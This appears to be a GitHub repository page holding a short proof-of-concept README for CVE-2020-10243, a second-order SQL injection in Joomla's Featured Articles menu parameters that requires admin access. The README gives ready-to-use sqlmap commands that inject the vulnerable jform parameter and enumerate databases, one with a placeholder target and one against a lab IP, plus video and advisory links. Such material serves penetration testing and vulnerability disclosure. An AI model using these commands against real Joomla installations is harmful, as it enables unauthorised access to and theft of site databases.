Skip to content
CVE-2020-10243: SQL injection in Featured Articles menu parameters
Branch: master
Clone or download

Latest commit

Latest commit 9053d24 Mar 21, 2020

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md CVE-2020-10243 PoC Mar 21, 2020

README.md

CVE-2020-10243: SQL injection in Featured Articles menu parameters

Author : Sam Thomas, Pentest.co.uk

PoC by me : April,10th,2020: I will unlock video

User requirment: admin (Not superadmin)

Type: Second Order SQL Injection

Exploit as video:

https://vimeo.com/398763205

Sqlmap:

sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "[your domain/IP]/index.php" --technique=E --dbs

Example:

sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "http://192.168.131.134:8080/index.php" --technique=E --dbs

Reference

https://pentest.co.uk/labs/advisory/cve-2020-10243/

https://developer.joomla.org/security-centre/807-20200306-core-sql-injection-in-featured-articles-menu-parameters.html

You can’t perform that action at this time.